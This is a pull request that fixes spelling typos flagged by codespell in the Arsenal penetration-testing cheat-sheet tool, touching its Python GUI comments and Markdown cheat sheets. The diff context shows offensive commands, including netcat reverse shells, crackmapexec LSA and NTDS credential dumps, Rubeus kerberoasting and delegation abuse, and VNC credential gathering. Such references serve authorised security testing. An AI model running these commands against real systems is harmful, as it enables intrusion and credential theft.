### PR TITLE
Fix typos discovered by codespell

### DIFF
--- a/.github/workflows/lint_python.yml
+++ b/.github/workflows/lint_python.yml
@@ -11,7 +11,7 @@ jobs:
                          flake8-comprehensions isort mypy pytest pyupgrade safety
       - run: bandit --recursive --skip B101 . || true  # B101 is assert statements
       - run: black --check . || true
-      - run: codespell || true  # --ignore-words-list="" --skip="*.css,*.js,*.lock"
+      - run: codespell --ignore-words-list="fo,seh"
       - run: flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
       - run: flake8 . --count --exit-zero --max-complexity=10 --max-line-length=88
                       --show-source --statistics

--- a/arsenal/modules/cheat.py
+++ b/arsenal/modules/cheat.py
@@ -254,7 +254,7 @@ class Cheats:
                     # New title found !
                     niv, title = parse_title(line)
 
-                    # Save first title (incase only niv1 title are used)
+                    # Save first title (in case only niv1 title are used)
                     if self.firsttitle == "":
                         self.firsttitle = title
 

--- a/arsenal/modules/command.py
+++ b/arsenal/modules/command.py
@@ -43,7 +43,7 @@ class Command:
         Process cmdline from the cheatsheet to get args names
         """
         self.args = []
-        # Use a list of tuples here insted of dict in case
+        # Use a list of tuples here instead of dict in case
         # the cmd has multiple args with the same name..
         for arg_name in re.findall(r'<([^ <>:]+)>', cheat.command):
             if "|" in arg_name:  # Format <name|default_value>

--- a/arsenal/modules/gui.py
+++ b/arsenal/modules/gui.py
@@ -232,7 +232,7 @@ class CheatslistMenu:
         self.draw_footbox(info)
         # create edit windows
         self.draw_editbox()
-        # init cursor postion (if first draw)
+        # init cursor position (if first draw)
         if self.x_init is None or self.y_init is None or self.xcursor is None:
             self.y_init, self.x_init = curses.getsyx()
             self.xcursor = self.x_init
@@ -581,7 +581,7 @@ class ArgslistMenu:
         padding_text_border = 3
         self.max_preview_size = self.width - (2 * self.AB_SIDE) - (2 * padding_text_border)
 
-        # draw backgroud cheatslist menu (clean resize)
+        # draw background cheatslist menu (clean resize)
         self.previous_menu.draw(stdscr)
 
         # draw argslist menu popup
@@ -636,7 +636,7 @@ class ArgslistMenu:
             if len(Gui.cmd.args) > 0:
                 self.draw_args_list(args_pos)
                 self.draw_selected_arg(args_pos)
-                # init cursor postion (if first draw)
+                # init cursor position (if first draw)
                 if self.x_init is None or self.y_init is None or self.xcursor is None:
                     self.y_init, self.x_init = curses.getsyx()
                     # prefill compatibility
@@ -694,7 +694,7 @@ class ArgslistMenu:
             self.draw(stdscr)
             c = stdscr.getch()
             if c == curses.KEY_ENTER or c == 10 or c == 13:
-                # try to buid the cmd
+                # try to build the cmd
                 # if cmd build is ok -> exit
                 # else continue in args menu
                 if Gui.cmd.build():
@@ -798,7 +798,7 @@ class Gui:
     def run(self, cheatsheets):
         """
         Gui entry point
-        :param cheatsheets: cheatsheets dictionnary
+        :param cheatsheets: cheatsheets dictionary
         """
         if self.cheats_menu is None:
             # Load cheatList if not already done

--- a/cheats/Arsenal/Active_directory/cme.md
+++ b/cheats/Arsenal/Active_directory/cme.md
@@ -4,7 +4,7 @@
 
 ## cme - enumerate hosts, network
 #plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON
-Exemple : cme smb 192.168.1.0/24
+Example : cme smb 192.168.1.0/24
 
 https://mpgn.gitbook.io/crackmapexec/
 
@@ -114,7 +114,7 @@ cme smb <ip> -u <user|Administrator> -p '<password>' --local-auth --wdigest enab
 ## cme - loggout user
 #plateform/linux #target/remote #port/445 #port/139 #protocol/smb #warning/modify_target #cat/POSTEXPLOIT
 
-Can be usefull after enable wdigest to force user to reconnect
+Can be useful after enable wdigest to force user to reconnect
 
 ```bash
 cme smb <ip> -u <user> -p '<password>' -x 'quser'
@@ -166,7 +166,7 @@ cme smb <ip> -u <user> -p <password> -d <domain> --sam
 #plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER
 
 Dump LSA secrets using methods from secretsdump.py
-Requires Domain Admin or Local Admin Priviledges on target Domain Controller
+Requires Domain Admin or Local Admin Privileges on target Domain Controller
 
 ```bash
 cme smb <ip> -u <user> -p <password> -d <domaine> --lsa
@@ -176,7 +176,7 @@ cme smb <ip> -u <user> -p <password> -d <domaine> --lsa
 #plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER
 
 Dump the NTDS.dit from target DC using methods from secretsdump.py
-Requires Domain Admin or Local Admin Priviledges on target Domain Controller
+Requires Domain Admin or Local Admin Privileges on target Domain Controller
 
 ```bash
 cme smb <ip> -u <user> -p <password> -d <domain> --ntds

--- a/cheats/Arsenal/Active_directory/rubeus.md
+++ b/cheats/Arsenal/Active_directory/rubeus.md
@@ -32,13 +32,13 @@
 .\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
 ```
 
-## Kerberoasting and outputing on a file with a spesific format
+## Kerberoasting and outputting on a file with a spesific format
 #plateform/windows #target/remote #cat/ATTACK/EXPLOIT  
 ```cmd
 .\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name>
 ```
 
-## Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
+## Kerberoasting while being "OPSEC" safe, essentially while not try to roast AES enabled accounts
 #plateform/windows #target/remote #cat/ATTACK/EXPLOIT  
 ```cmd
 .\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /rc4opsec
@@ -74,7 +74,7 @@
 .\Rubeus.exe asktgt /user:<user> /domain:<domain_name> /rc4:<ntlm_hash> /ptt
 ```
 
-## S4U - with ticket - Contrained delegation
+## S4U - with ticket - Constrained delegation
 #plateform/windows #target/remote #cat/ATTACK/EXPLOIT 
 ```
 .\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:<user> /msdsspn:ldap/<domain_fqdn> /altservice:cifs /ptt
@@ -92,7 +92,7 @@
 .\Rubeus.exe hash /password:<machine_password>
 ```
 
-## S4U - Resource based contrained delegation
+## S4U - Resource based constrained delegation
 #plateform/windows #target/remote #cat/ATTACK/EXPLOIT 
 ```
 .\Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:<user_to_impersonate> /msdsspn:cifs/<domain_fqdn> /domain:<domain_name> /ptt

--- a/cheats/Arsenal/Archive/7z.md
+++ b/cheats/Arsenal/Archive/7z.md
@@ -6,5 +6,5 @@
 
 ## 7z create archive with password
 ```
-7z a <archive_name>.7z -p<pasword> <file>
+7z a <archive_name>.7z -p<password> <file>
 ```

--- a/cheats/Arsenal/Archive/zip.md
+++ b/cheats/Arsenal/Archive/zip.md
@@ -29,7 +29,7 @@ zip -u <file>.zip <file_to_add>
 zipinfo <file>.zip
 ```
 
-## create zip file with symlink (usefull for path traversal)
+## create zip file with symlink (useful for path traversal)
 ```
 zip --symlinks <file>.zip <symlink_file>
 ```

--- a/cheats/Arsenal/Language/php.md
+++ b/cheats/Arsenal/Language/php.md
@@ -49,7 +49,7 @@ grep -rn --include "*.php" -e "^\(.*\s\|\)mail(.*\\$" --color
 grep -rn --include "*.php" -e "^\(.*\s\|\)\(echo\|printf\|print\)\(\s\|(\).*\\$" --color
 ```
 
-## php grep weak comparaison
+## php grep weak comparison
 ```
 grep -rn --include "*.php" -e "\(\\\$[^=]\|0\)\s*==\s*\(0\|\\\$[^=]\\)" --color
 ```

--- a/cheats/Arsenal/Linux/linux.md
+++ b/cheats/Arsenal/Linux/linux.md
@@ -264,7 +264,7 @@ ps aux | grep php
 tail error.log -f -n 0
 ```
 
-## Start appliction
+## Start application
 ```
 xdg-open <programme> 
 ```

--- a/cheats/Arsenal/Protocol/dns.md
+++ b/cheats/Arsenal/Protocol/dns.md
@@ -34,7 +34,7 @@ dig ANY <domain_name> @<dns_ip>
 dig -x <ip> @<dns_ip>
 ```
 
-## dig zone transfert
+## dig zone transfer
 #plateform/linux  #target/remote  #cat/RECON
 ```
 dig axfr <domain_name> @<name_server>
@@ -46,7 +46,7 @@ dig axfr <domain_name> @<name_server>
 dig +short <domain_name> @resolver1.opendns.com
 ```
 
-## dig, find domains file ip addresse value
+## dig, find domains file ip address value
 #plateform/linux  #target/remote  #cat/RECON
 ```
 dig -f <domains.txt> +noall +answer
@@ -66,7 +66,7 @@ dig -f <domains.txt> MX +noall +answer
 dnsrecon -d <domain>
 ```
 
-## dnsrecon zone transfert
+## dnsrecon zone transfer
 #plateform/linux  #target/remote  #cat/RECON
 ```
 dnsrecon -d <domain> -t axfr

--- a/cheats/Arsenal/Protocol/mysql.md
+++ b/cheats/Arsenal/Protocol/mysql.md
@@ -14,7 +14,7 @@ mysql -u <user> -p<password> -h <hostname> <database>
 mysql -u <user> -p -e "create database <database> character set UTF8mb4 collate utf8mb4_bin"
 ```
 
-## Export databse
+## Export database
 #cat/UTILS 
 ```
 mysqldump -u <user> -p <database> > <path>

--- a/cheats/Arsenal/Protocol/smb/enum4linux.md
+++ b/cheats/Arsenal/Protocol/smb/enum4linux.md
@@ -4,7 +4,7 @@
 
 #plateform/linux  #target/remote  #port/445 #protocol/smb #cat/RECON 
 
-## enum4linux - all except dictionnary based share name listing (default)
+## enum4linux - all except dictionary based share name listing (default)
 ```
 enum4linux -a <ip>
 ```

--- a/cheats/Arsenal/Protocol/vnc.md
+++ b/cheats/Arsenal/Protocol/vnc.md
@@ -39,7 +39,7 @@ msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS <ip>; set RPORT <
 msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS <ip>; set RPORT <port>; set USER_FILE <users_file>; set PASS_FILE <pass_file>; run"
 ```
 
-## vnc - post exploit retreive credentials
+## vnc - post exploit retrieve credentials
 #cat/POSTEXPLOIT/CREDS_RECOVER 
 ```
 msfconsole -x "use post/windows/gather/credentials/vnc; set SESSION <session>; run"

--- a/cheats/Arsenal/ReverseShell/nc.md
+++ b/cheats/Arsenal/ReverseShell/nc.md
@@ -32,13 +32,13 @@ nc -nv <ip> <port> -e cmd.exe
 nc -nv <ip> <port> -e /bin/bash
 ```
 
-## nc transfert file - receiver
+## nc transfer file - receiver
 #plateform/linux #cat/ATTACK/FILE_TRANSFERT 
 ```
 nc -nlvp <port> > <incomming_file>
 ```
 
-## nc transfert file - sender
+## nc transfer file - sender
 #plateform/linux #cat/ATTACK/FILE_TRANSFERT 
 ```
 nc -nv <ip> <port> < <file_to_send>

--- a/cheats/Arsenal/Windows/windows.md
+++ b/cheats/Arsenal/Windows/windows.md
@@ -22,7 +22,7 @@ findstr /si 'password' *.txt *.xml *.docx
 findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
 ```
 
-## get patchs
+## get patches
 ```
 wmic qfe get Caption,Description,HotFixID,InstalledOn
 ```
@@ -47,7 +47,7 @@ nslookup -type=any <userdnsdomain>.
 wmic logicaldisk get caption,description,providername
 ```
 
-## show recyle bin
+## show recycle bin
 ```
 dir C:\$Recycle.Bin /s /b
 ```

--- a/cheats/README.md
+++ b/cheats/README.md
@@ -40,7 +40,7 @@
 ```
 
 Tags are used to categorize the cheat sheet
-Command tags start with a #tag the level1 tags are overrided by other tags commands tags are in the form : #key/value
+Command tags start with a #tag the level1 tags are overridden by other tags commands tags are in the form : #key/value
 
 ## Command description
 Lines beginning with `#` represents the command main description


### PR DESCRIPTION
[`codespell --ignore-words-list="fo,seh"`](https://pypi.org/project/codespell)